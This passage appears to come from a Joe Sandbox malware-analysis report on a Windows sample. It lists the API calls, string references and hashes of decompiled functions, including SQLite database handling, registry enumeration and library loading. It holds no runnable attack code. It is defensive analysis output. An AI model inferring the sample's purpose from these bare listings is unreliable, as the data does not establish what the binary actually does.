                                                                                                                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                • strchr.MSVCRT ref: 0040C140
                                                                                                                                                • strchr.MSVCRT ref: 0040C151
                                                                                                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                • memset.MSVCRT ref: 0040C17A
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                • String ID: 4$h
                                                                                                                                                • API String ID: 4066021378-1856150674
                                                                                                                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                • String ID: %%0.%df
                                                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                APIs
                                                                                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                • GetParent.USER32(?), ref: 00406136
                                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                • String ID: A
                                                                                                                                                • API String ID: 2892645895-3554254475
                                                                                                                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                • String ID: 0$6
                                                                                                                                                • API String ID: 4066108131-3849865405
                                                                                                                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004082EF
                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                • memset.MSVCRT ref: 00408362
                                                                                                                                                • memset.MSVCRT ref: 00408377
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ByteCharMultiWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 290601579-0
                                                                                                                                                • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040A47B
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                • String ID: %s (%s)$YV@
                                                                                                                                                • API String ID: 3979103747-598926743
                                                                                                                                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                                                • API String ID: 2767993716-572158859
                                                                                                                                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                • out of memory, xrefs: 0042F865
                                                                                                                                                • database is already attached, xrefs: 0042F721
                                                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                • API String ID: 1297977491-2001300268
                                                                                                                                                • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                                                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                                                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                APIs
                                                                                                                                                • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                • free.MSVCRT ref: 004185AC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2802642348-0
                                                                                                                                                • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
• wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
• wcslen.MSVCRT ref: 0040D1D3
• GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
• LoadStringW.USER32(00000000,?,?), ref: 0040D20C
• memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
• String ID: strings
• API String ID: 3166385802-3030018805
APIs
• memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
• memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
• memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
• memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
• memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
• memset.MSVCRT ref: 0041BA3D
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memcpy$memset
• String ID: -journal$-wal
• API String ID: 438689982-2894717839
APIs
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
• memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
• memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
• memcpy.MSVCRT(?,?,00000040), ref: 0044A988
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
• memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
• memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
• memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memcpy$memset
• String ID: gj
• API String ID: 438689982-4203073231
APIs
  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
• memset.MSVCRT ref: 00405455
• memset.MSVCRT ref: 0040546C
• memset.MSVCRT ref: 00405483
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memset$memcpy$ErrorLast
• String ID: 6$\
• API String ID: 404372293-1284684873
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
• GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
• GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
• wcscpy.MSVCRT ref: 0040A0D9
• wcscat.MSVCRT ref: 0040A0E6
• wcscat.MSVCRT ref: 0040A0F5
• wcscpy.MSVCRT ref: 0040A107
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: Time$Formatwcscatwcscpy$DateFileSystem
• String ID:
• API String ID: 1331804452-0
APIs
  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
• GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
• GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: advapi32.dll
• API String ID: 2012295524-4050573280
APIs
Strings
• <%s>, xrefs: 004100A6
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
• <?xml version="1.0" ?>, xrefs: 0041007C
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memset$_snwprintf
• String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
• API String ID: 3473751417-2880344631
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: wcscat$_snwprintfmemset
• String ID: %2.2X
• API String ID: 2521778956-791839006
                                                                                                                                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                • API String ID: 999028693-502967061
                                                                                                                                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                • memset.MSVCRT ref: 0040C439
                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4131475296-0
                                                                                                                                                • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                                                                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004116FF
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
